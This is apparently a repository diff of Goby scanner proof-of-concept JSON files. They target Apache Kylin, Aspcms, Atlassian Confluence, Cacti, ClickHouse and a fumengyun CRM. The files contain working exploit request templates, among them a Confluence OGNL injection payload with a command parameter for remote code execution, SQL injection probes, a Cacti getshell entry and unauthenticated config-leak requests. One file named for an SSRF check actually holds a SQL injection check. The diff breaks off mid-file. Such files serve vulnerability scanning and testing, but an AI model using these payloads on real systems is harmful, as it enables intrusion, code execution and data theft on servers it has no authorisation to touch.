12		-	"Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.",
13		-	"Recommendation": "update",
	11	+	"Author": "PeiQi",
	12	+	"Impact": "<p>Attackers can use this vulnerability to obtain sensitive information of the system.<br></p>",
	13	+	"Recommandation": "<p>Upgrade to the safe version, or perform the following mitigation measures:</p><p>Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \"；</p><p>Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\"；</p><p>Restart the kylin instance to take effect.</p>",
14	14		"References": [
15		-	"https://nvd.nist.gov/vuln/detail/CVE-2020-13937"
	15	+	"http://wiki.peiqi.tech"
16	16		],
17		-	"HasExp": true,
18		-	"ExpParams": [
19		-	{
20		-	"Name": "Config",
21		-	"Type": "select",
22		-	"Value": "/kylin/api/admin/config"
23		-	}
24		-	],
25		-	"ExpTips": {
26		-	"Type": "",
27		-	"Content": ""
28		-	},
	17	+	"HasExp": true,
	18	+	"ExpParams": [
	19	+	{
	20	+	"name": "Config",
	21	+	"type": "select",
	22	+	"value": "/kylin/api/admin/config",
	23	+	"show": ""
	24	+	}
	25	+	],
29	26		"ScanSteps": [
30	27		"AND",
31	28		{
		skipped 1 lines
33	30		"method": "GET",
34	31		"uri": "/kylin/api/admin/config",
35	32		"follow_redirect": true,
36		-	"header": null,
	33	+	"header": {},
37	34		"data_type": "text",
38	35		"data": ""
39	36		},
		skipped 20 lines
60	57		"SetVariable": []
61	58		}
62	59		],
63		-	"ExploitSteps": [
	60	+	"ExploitSteps": [
64	61		"AND",
65	62		{
66	63		"Request": {
67	64		"method": "GET",
68	65		"uri": "/kylin/api/admin/config",
69	66		"follow_redirect": true,
70		-	"header": null,
	67	+	"header": {},
71	68		"data_type": "text",
72	69		"data": ""
73	70		},
74		-	"ResponseTest": {
	71	+	"ResponseTest": {
75	72		"type": "group",
76	73		"operation": "AND",
77	74		"checks": [
		skipped 14 lines
92	89		]
93	90		},
94	91		"SetVariable": [
95		-	"output\|lastbody\|undefined\|undefined"
96		-	]
	92	+	"output\|lastbody"
	93	+	]
97	94		}
98	95		],
99		-	"PostTime": "0000-00-00 00:00:00",
100		-	"GobyVersion": "0.0.0"
	96	+	"PostTime": "2021-04-04 15:55:28",
	97	+	"GobyVersion": "1.8.255"
101	98		}

lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_ShenYu_Admin_Unauth_Access_CVE_2022_23944.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Solr_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Solr_Log4j2CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Solr_RemoteStreaming_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Struts2_S2_053_RCE_CVE_2017_12611.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Struts2_S2_059_RCE_CVE_2019_0230.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Apache_Struts2_S2_062_RCE_CVE_2021_31805.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/AspCMS_commentList.asp_SQLinjection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Aspcms_Backend_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 4 lines
5	5		"infoleak"
6	6		],
7	7		"GobyQuery": "app=\"ASPCMS\"",
8		-	"Description": "aspCMS is a module based ASP Content Management System (CMS).",
	8	+	"Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url",
9	9		"Product": "ASPCMS",
10		-	"Homepage": "",
11		-	"Author": "",
12		-	"Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.",
	10	+	"Homepage": "https://gobies.org/",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "<p>leak backend url<br></p>",
13	13		"Recommendation": "",
14	14		"References": [],
15	15		"HasExp": true,
		skipped 110 lines
126	126		]
127	127		}
128	128		],
129		-	"PostTime": "0000-00-00 00:00:00",
130		-	"GobyVersion": "0.0.0"
	129	+	"PostTime": "2021-11-02 20:50:45",
	130	+	"GobyVersion": "1.8.302"
131	131		}

lib/goby/goby_pocs/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Atlassian_Confluence_OGNL_Injection_RCE_CVE_2022_26134.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Atlassian Confluence OGNL Injection CVE-2021-26084",
	2	+	"Name": "Atlassian Confluence OGNL injection CVE-2021-26084",
3	3		"Level": "3",
4	4		"Tags": [
5		-	"sqli"
	5	+	"rce"
6	6		],
7		-	"GobyQuery": "app=\"Confluence\" \|\| product=\"Confluence\" \|\| company=\"Atlassian\"",
8		-	"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.",
	7	+	"GobyQuery": "app=\"Confluence\"",
	8	+	"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.",
9	9		"Product": "Atlassian Confluence",
10	10		"Homepage": "https://www.atlassian.com",
11		-	"Author": "",
12		-	"Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
13		-	"Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
	11	+	"Author": "luckying1314@139.com",
	12	+	"Impact": "<p>An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.<br></p>",
	13	+	"Recommendation": "<p>General repair suggestions:</p><p>Check and upgrade to the secure version based on the information in the affected version. The official download link is ：<a href>https://www.atlassian.com/software/confluence/download-archives</a></p><p>Temporary repair suggestions:</p><p>If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.：<a href>https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html</a></p>",
14	14		"References": [
15		-	"https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
16		-	"https://jira.atlassian.com/browse/CONFSERVER-67940",
17		-	"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html"
	15	+	"https://github.com/alt3kx/CVE-2021-26084_PoC"
18	16		],
19	17		"HasExp": true,
20	18		"ExpParams": [
21	19		{
22		-	"Name": "Command",
	20	+	"Name": "command",
23	21		"Type": "input",
24	22		"Value": "whoami"
25		-	},
26		-	{
27		-	"Name": "Path",
28		-	"Type": "select",
29		-	"Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features"
30	23		}
31	24		],
32	25		"ExpTips": {
		skipped 1 lines
34	27		"Content": ""
35	28		},
36	29		"ScanSteps": [
37		-	"OR",
	30	+	"AND",
38	31		{
39	32		"Request": {
40	33		"method": "POST",
		skipped 3 lines
44	37		"Content-Type": "application/x-www-form-urlencoded"
45	38		},
46	39		"data_type": "text",
47		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
48		-	"set_variable": []
49		-	},
50		-	"ResponseTest": {
51		-	"type": "group",
52		-	"operation": "AND",
53		-	"checks": [
54		-	{
55		-	"type": "item",
56		-	"variable": "$code",
57		-	"operation": "==",
58		-	"value": "200",
59		-	"bz": ""
60		-	},
61		-	{
62		-	"type": "item",
63		-	"variable": "$body",
64		-	"operation": "contains",
65		-	"value": "value=\"aaaa{140592=null}",
66		-	"bz": ""
67		-	}
68		-	]
69		-	},
70		-	"SetVariable": []
71		-	},
72		-	{
73		-	"Request": {
74		-	"method": "POST",
75		-	"uri": "/pages/createpage-entervariables.action",
76		-	"follow_redirect": true,
77		-	"header": {
78		-	"Content-Type": "application/x-www-form-urlencoded"
79		-	},
80		-	"data_type": "text",
81		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
82		-	"set_variable": []
83		-	},
84		-	"ResponseTest": {
85		-	"type": "group",
86		-	"operation": "AND",
87		-	"checks": [
88		-	{
89		-	"type": "item",
90		-	"variable": "$code",
91		-	"operation": "==",
92		-	"value": "200",
93		-	"bz": ""
94		-	},
95		-	{
96		-	"type": "item",
97		-	"variable": "$body",
98		-	"operation": "contains",
99		-	"value": "value=\"aaaa{140592=null}",
100		-	"bz": ""
101		-	}
	40	+	"data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027",
	41	+	"set_variable": [
	42	+	"r1\|rand\|int\|8",
	43	+	"r2\|rand\|int\|7",
	44	+	"r4\|r1\|add\|r2"
102	45		]
103	46		},
104		-	"SetVariable": []
105		-	},
106		-	{
107		-	"Request": {
108		-	"method": "POST",
109		-	"uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x",
110		-	"follow_redirect": true,
111		-	"header": {
112		-	"Content-Type": "application/x-www-form-urlencoded"
113		-	},
114		-	"data_type": "text",
115		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
116		-	"set_variable": []
117		-	},
118	47		"ResponseTest": {
119	48		"type": "group",
120	49		"operation": "AND",
		skipped 9 lines
130	59		"type": "item",
131	60		"variable": "$body",
132	61		"operation": "contains",
133		-	"value": "value=\"aaaa{140592=null}",
	62	+	"value": "{{{r4}}}",
134	63		"bz": ""
135	64		}
136	65		]
137	66		},
138		-	"SetVariable": []
139		-	},
140		-	{
141		-	"Request": {
142		-	"method": "POST",
143		-	"uri": "/confluence/pages/createpage-entervariables.action",
144		-	"follow_redirect": true,
145		-	"header": {
146		-	"Content-Type": "application/x-www-form-urlencoded"
147		-	},
148		-	"data_type": "text",
149		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
150		-	"set_variable": []
151		-	},
152		-	"ResponseTest": {
153		-	"type": "group",
154		-	"operation": "AND",
155		-	"checks": [
156		-	{
157		-	"type": "item",
158		-	"variable": "$code",
159		-	"operation": "==",
160		-	"value": "200",
161		-	"bz": ""
162		-	},
163		-	{
164		-	"type": "item",
165		-	"variable": "$body",
166		-	"operation": "contains",
167		-	"value": "value=\"aaaa{140592=null}",
168		-	"bz": ""
169		-	}
170		-	]
171		-	},
172		-	"SetVariable": []
173		-	},
174		-	{
175		-	"Request": {
176		-	"method": "POST",
177		-	"uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x",
178		-	"follow_redirect": true,
179		-	"header": {
180		-	"Content-Type": "application/x-www-form-urlencoded"
181		-	},
182		-	"data_type": "text",
183		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
184		-	"set_variable": []
185		-	},
186		-	"ResponseTest": {
187		-	"type": "group",
188		-	"operation": "AND",
189		-	"checks": [
190		-	{
191		-	"type": "item",
192		-	"variable": "$code",
193		-	"operation": "==",
194		-	"value": "200",
195		-	"bz": ""
196		-	},
197		-	{
198		-	"type": "item",
199		-	"variable": "$body",
200		-	"operation": "contains",
201		-	"value": "value=\"aaaa{140592=null}",
202		-	"bz": ""
203		-	}
204		-	]
205		-	},
206		-	"SetVariable": []
207		-	},
208		-	{
209		-	"Request": {
210		-	"method": "POST",
211		-	"uri": "/wiki/pages/createpage-entervariables.action",
212		-	"follow_redirect": true,
213		-	"header": {
214		-	"Content-Type": "application/x-www-form-urlencoded"
215		-	},
216		-	"data_type": "text",
217		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
218		-	"set_variable": []
219		-	},
220		-	"ResponseTest": {
221		-	"type": "group",
222		-	"operation": "AND",
223		-	"checks": [
224		-	{
225		-	"type": "item",
226		-	"variable": "$code",
227		-	"operation": "==",
228		-	"value": "200",
229		-	"bz": ""
230		-	},
231		-	{
232		-	"type": "item",
233		-	"variable": "$body",
234		-	"operation": "contains",
235		-	"value": "value=\"aaaa{140592=null}",
236		-	"bz": ""
237		-	}
238		-	]
239		-	},
240		-	"SetVariable": []
241		-	},
242		-	{
243		-	"Request": {
244		-	"method": "POST",
245		-	"uri": "/pages/doenterpagevariables.action",
246		-	"follow_redirect": true,
247		-	"header": {
248		-	"Content-Type": "application/x-www-form-urlencoded"
249		-	},
250		-	"data_type": "text",
251		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
252		-	"set_variable": []
253		-	},
254		-	"ResponseTest": {
255		-	"type": "group",
256		-	"operation": "AND",
257		-	"checks": [
258		-	{
259		-	"type": "item",
260		-	"variable": "$code",
261		-	"operation": "==",
262		-	"value": "200",
263		-	"bz": ""
264		-	},
265		-	{
266		-	"type": "item",
267		-	"variable": "$body",
268		-	"operation": "contains",
269		-	"value": "value=\"aaaa{140592=null}",
270		-	"bz": ""
271		-	}
272		-	]
273		-	},
274		-	"SetVariable": []
275		-	},
276		-	{
277		-	"Request": {
278		-	"method": "POST",
279		-	"uri": "/pages/createpage.action?spaceKey=myproj",
280		-	"follow_redirect": true,
281		-	"header": {
282		-	"Content-Type": "application/x-www-form-urlencoded"
283		-	},
284		-	"data_type": "text",
285		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
286		-	"set_variable": []
287		-	},
288		-	"ResponseTest": {
289		-	"type": "group",
290		-	"operation": "AND",
291		-	"checks": [
292		-	{
293		-	"type": "item",
294		-	"variable": "$code",
295		-	"operation": "==",
296		-	"value": "200",
297		-	"bz": ""
298		-	},
299		-	{
300		-	"type": "item",
301		-	"variable": "$body",
302		-	"operation": "contains",
303		-	"value": "value=\"aaaa{140592=null}",
304		-	"bz": ""
305		-	}
306		-	]
307		-	},
308		-	"SetVariable": []
309		-	},
310		-	{
311		-	"Request": {
312		-	"method": "POST",
313		-	"uri": "/pages/templates2/viewpagetemplate.action",
314		-	"follow_redirect": true,
315		-	"header": {
316		-	"Content-Type": "application/x-www-form-urlencoded"
317		-	},
318		-	"data_type": "text",
319		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
320		-	"set_variable": []
321		-	},
322		-	"ResponseTest": {
323		-	"type": "group",
324		-	"operation": "AND",
325		-	"checks": [
326		-	{
327		-	"type": "item",
328		-	"variable": "$code",
329		-	"operation": "==",
330		-	"value": "200",
331		-	"bz": ""
332		-	},
333		-	{
334		-	"type": "item",
335		-	"variable": "$body",
336		-	"operation": "contains",
337		-	"value": "value=\"aaaa{140592=null}",
338		-	"bz": ""
339		-	}
340		-	]
341		-	},
342		-	"SetVariable": []
343		-	},
344		-	{
345		-	"Request": {
346		-	"method": "POST",
347		-	"uri": "/pages/createpage-entervariables.action",
348		-	"follow_redirect": true,
349		-	"header": {
350		-	"Content-Type": "application/x-www-form-urlencoded"
351		-	},
352		-	"data_type": "text",
353		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
354		-	"set_variable": []
355		-	},
356		-	"ResponseTest": {
357		-	"type": "group",
358		-	"operation": "AND",
359		-	"checks": [
360		-	{
361		-	"type": "item",
362		-	"variable": "$code",
363		-	"operation": "==",
364		-	"value": "200",
365		-	"bz": ""
366		-	},
367		-	{
368		-	"type": "item",
369		-	"variable": "$body",
370		-	"operation": "contains",
371		-	"value": "value=\"aaaa{140592=null}",
372		-	"bz": ""
373		-	}
374		-	]
375		-	},
376		-	"SetVariable": []
377		-	},
378		-	{
379		-	"Request": {
380		-	"method": "POST",
381		-	"uri": "/template/custom/content-editor",
382		-	"follow_redirect": true,
383		-	"header": {
384		-	"Content-Type": "application/x-www-form-urlencoded"
385		-	},
386		-	"data_type": "text",
387		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
388		-	"set_variable": []
389		-	},
390		-	"ResponseTest": {
391		-	"type": "group",
392		-	"operation": "AND",
393		-	"checks": [
394		-	{
395		-	"type": "item",
396		-	"variable": "$code",
397		-	"operation": "==",
398		-	"value": "200",
399		-	"bz": ""
400		-	},
401		-	{
402		-	"type": "item",
403		-	"variable": "$body",
404		-	"operation": "contains",
405		-	"value": "value=\"aaaa{140592=null}",
406		-	"bz": ""
407		-	}
408		-	]
409		-	},
410		-	"SetVariable": []
411		-	},
412		-	{
413		-	"Request": {
414		-	"method": "POST",
415		-	"uri": "/templates/editor-preload-container",
416		-	"follow_redirect": true,
417		-	"header": {
418		-	"Content-Type": "application/x-www-form-urlencoded"
419		-	},
420		-	"data_type": "text",
421		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
422		-	"set_variable": []
423		-	},
424		-	"ResponseTest": {
425		-	"type": "group",
426		-	"operation": "AND",
427		-	"checks": [
428		-	{
429		-	"type": "item",
430		-	"variable": "$code",
431		-	"operation": "==",
432		-	"value": "200",
433		-	"bz": ""
434		-	},
435		-	{
436		-	"type": "item",
437		-	"variable": "$body",
438		-	"operation": "contains",
439		-	"value": "value=\"aaaa{140592=null}",
440		-	"bz": ""
441		-	}
442		-	]
443		-	},
444		-	"SetVariable": []
445		-	},
446		-	{
447		-	"Request": {
448		-	"method": "POST",
449		-	"uri": "/users/user-dark-features",
450		-	"follow_redirect": true,
451		-	"header": {
452		-	"Content-Type": "application/x-www-form-urlencoded"
453		-	},
454		-	"data_type": "text",
455		-	"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
456		-	"set_variable": []
457		-	},
458		-	"ResponseTest": {
459		-	"type": "group",
460		-	"operation": "AND",
461		-	"checks": [
462		-	{
463		-	"type": "item",
464		-	"variable": "$code",
465		-	"operation": "==",
466		-	"value": "200",
467		-	"bz": ""
468		-	},
469		-	{
470		-	"type": "item",
471		-	"variable": "$body",
472		-	"operation": "contains",
473		-	"value": "value=\"aaaa{140592=null}",
474		-	"bz": ""
475		-	}
476		-	]
477		-	},
478		-	"SetVariable": []
	67	+	"SetVariable": [
	68	+	"output\|lastbody\|regex\|"
	69	+	]
479	70		}
480	71		],
481	72		"ExploitSteps": [
		skipped 1 lines
483	74		{
484	75		"Request": {
485	76		"method": "POST",
486		-	"uri": "{{{Path}}}",
	77	+	"uri": "/pages/createpage-entervariables.action?SpaceKey=x",
487	78		"follow_redirect": true,
488	79		"header": {
489	80		"Content-Type": "application/x-www-form-urlencoded"
		skipped 20 lines
510	101		]
511	102		}
512	103		],
513		-	"PostTime": "0000-00-00 00:00:00",
514		-	"GobyVersion": "0.0.0"
	104	+	"PostTime": "2021-09-03 11:27:04",
	105	+	"GobyVersion": "1.8.300"
515	106		}

lib/goby/goby_pocs/Atlassian_Jira_Path_Traversal_CVE_2021_26086.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Atlassian_Jira_Seraph_Authentication_bypass_CVE_2022_0540.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure_CVE_2020_14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/BSPHP_index.php_unauthorized_access_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/BigAnt_Server_v5.6.06_Path_Traversal_CVE_2022_23347.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CVE_2018_19367_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/CVE_2022_22947.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Cacti_Weathermap_File_Write.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"getshell"
6	6		],
7		-	"GobyQuery": "app=\"cacti-监控系统\" \|\| title=\"Login to Cacti\" \|\| app=\"Cactiez\"",
8		-	"Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.",
9		-	"Product": "cacti",
	7	+	"GobyQuery": "(app=\"cacti-监控系统\"\|title=\"Login to Cacti\"\|app=\"Cactiez\")",
	8	+	"Description": "allows remote attackers to upload and execute arbitrary files",
	9	+	"Product": "cacti-监控系统",
10	10		"Homepage": "https://www.cacti.net/",
11		-	"Author": "",
12		-	"Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "<p>Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.<br></p>",
13	13		"Recommendation": "",
14	14		"References": [],
15	15		"HasExp": true,
		skipped 105 lines
121	121		]
122	122		}
123	123		],
124		-	"PostTime": "0000-00-00 00:00:00",
125		-	"GobyVersion": "0.0.0"
	124	+	"PostTime": "2021-11-05 13:30:24",
	125	+	"GobyVersion": "1.8.302"
126	126		}

lib/goby/goby_pocs/Casdoor_1.13.0_SQL_InjectionCVE_2022_24124.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Cerebro_request_SSRF.json

1	+	{
2	+	"Name": "fumengyun AjaxMethod.ashx SQL injection",
3	+	"Level": "3",
4	+	"Tags": [
5	+	"sqli"
6	+	],
7	+	"GobyQuery": "title=\"孚盟云\"",
8	+	"Description": "",
9	+	"Product": "",
10	+	"Homepage": "https://gobies.org/",
11	+	"Author": "[email protected]",
12	+	"Impact": "",
13	+	"Recommendation": "",
14	+	"References": [
15	+	"https://gobies.org/"
16	+	],
17	+	"HasExp": true,
18	+	"ExpParams": null,
19	+	"ExpTips": {
20	+	"Type": "",
21	+	"Content": ""
22	+	},
23	+	"ScanSteps": [
24	+	"AND",
25	+	{
26	+	"Request": {
27	+	"method": "GET",
28	+	"uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
29	+	"follow_redirect": true,
30	+	"header": null,
31	+	"data_type": "text",
32	+	"data": "",
33	+	"set_variable": []
34	+	},
35	+	"ResponseTest": {
36	+	"type": "group",
37	+	"operation": "AND",
38	+	"checks": [
39	+	{
40	+	"type": "item",
41	+	"variable": "$code",
42	+	"operation": "==",
43	+	"value": "500",
44	+	"bz": ""
45	+	},
46	+	{
47	+	"type": "item",
48	+	"variable": "$body",
49	+	"operation": "contains",
50	+	"value": "SELECT",
51	+	"bz": ""
52	+	}
53	+	]
54	+	},
55	+	"SetVariable": [
56	+	"output\|lastbody\|regex\|"
57	+	]
58	+	}
59	+	],
60	+	"ExploitSteps": [
61	+	"AND",
62	+	{
63	+	"Request": {
64	+	"method": "GET",
65	+	"uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
66	+	"follow_redirect": true,
67	+	"header": null,
68	+	"data_type": "text",
69	+	"data": "",
70	+	"set_variable": []
71	+	},
72	+	"ResponseTest": {
73	+	"type": "group",
74	+	"operation": "AND",
75	+	"checks": [
76	+	{
77	+	"type": "item",
78	+	"variable": "$code",
79	+	"operation": "==",
80	+	"value": "500",
81	+	"bz": ""
82	+	},
83	+	{
84	+	"type": "item",
85	+	"variable": "$body",
86	+	"operation": "contains",
87	+	"value": "SELECT",
88	+	"bz": ""
89	+	}
90	+	]
91	+	},
92	+	"SetVariable": [
93	+	"output\|lastbody\|regex\|"
94	+	]
95	+	}
96	+	],
97	+	"PostTime": "2022-07-02 21:53:57",
98	+	"GobyVersion": "1.9.323"
99	+	}

lib/goby/goby_pocs/Chanjet_CRM_get_usedspace.php_sql_injection_CNVD_2021_12845.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/China_Mobile_Yu_Routing_ExportSettings.sh_Info_Leak_CNVD_2020_67110.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/China_Mobile_Yu_Routing_Login_Bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/China_Mobile_Yu_routed_the_login_bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Citrix_Unauthorized_CVE_2020_8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Citrix_unauthenticated_LFI_CVE-2020-8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/ClickHouse_SQLI.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"sqli"
6	6		],
7		-	"GobyQuery": "banner=\"X-Clickhouse-Summary\" \|\| port=\"8123\"",
8		-	"Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.",
	7	+	"GobyQuery": "(banner=\"X-Clickhouse-Summary\" \| port=\"8123\")",
	8	+	"Description": "ClickHouse 存在着的接口由于没有鉴权，则任意访问者都可以执行SQL语句获取数据.",
9	9		"Product": "ClickHouse",
10		-	"Homepage": "https://clickhouse.com/",
11		-	"Author": "",
12		-	"Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.",
	10	+	"Homepage": "https://gobies.org/",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
16	16		],
17		-	"HasExp": true,
	17	+	"HasExp": false,
18	18		"ExpParams": null,
19	19		"ExpTips": {
20	20		"Type": "",
		skipped 77 lines
98	98		]
99	99		}
100	100		],
101		-	"ExploitSteps": [
102		-	"AND",
103		-	{
104		-	"Request": {
105		-	"method": "GET",
106		-	"uri": "/test.php",
107		-	"follow_redirect": true,
108		-	"header": null,
109		-	"data_type": "text",
110		-	"data": "",
111		-	"set_variable": []
112		-	},
113		-	"ResponseTest": {
114		-	"type": "group",
115		-	"operation": "AND",
116		-	"checks": [
117		-	{
118		-	"type": "item",
119		-	"variable": "$code",
120		-	"operation": "==",
121		-	"value": "200",
122		-	"bz": ""
123		-	},
124		-	{
125		-	"type": "item",
126		-	"variable": "$body",
127		-	"operation": "contains",
128		-	"value": "test",
